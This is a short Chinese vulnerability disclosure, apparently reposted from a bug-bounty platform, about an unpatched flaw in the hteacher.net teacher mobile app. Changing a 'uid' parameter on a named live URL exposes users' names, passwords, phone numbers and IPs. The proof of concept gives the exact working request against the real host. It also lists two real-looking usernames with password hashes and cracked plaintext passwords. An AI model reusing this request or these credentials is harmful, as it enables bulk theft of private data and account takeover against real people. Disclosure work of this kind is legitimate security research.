潜在风险
可泄露大量数据
漏洞处理状态
暂无修复
漏洞详情
披露状态:
2017-11-7 3:00:00 漏洞细节对公众公开
2017-9-23 3:00:00 漏洞细节对牛犊公开
2017-8-24 3:00:00 漏洞细节对牛人公开
2017-8-4 3:00:00 漏洞细节对神牛和大牛公开
2017-7-25 3:00:00 漏洞细节对第三方安全公司公开
漏洞证明(POC):
注册个账户进入到app,抓包可发现一个url
http://mobileapp.hteacher.net/teacher/index.php/member/get_userInfo?uid=1
然后在浏览器上查看
可以查看363万用户的账户名、密码、IP登陆地、省份、手机号等信息(密码可解密)
http://mobileapp.hteacher.net/teacher/index.php/member/get_userInfo?uid=3630000
密码能随意解密:
用户名:jszx_app407333643 passwd:edcfa7411cf3a03f 解密后:zf8790
jszx_qq923216261 49ba59abbe56e057 123456
验证数据真实性,主站登陆
利用代码(EXP):
修复方案:
(暂无内容)
本文由 podipod软库网 作者:DevOps 发表,转载请注明来源!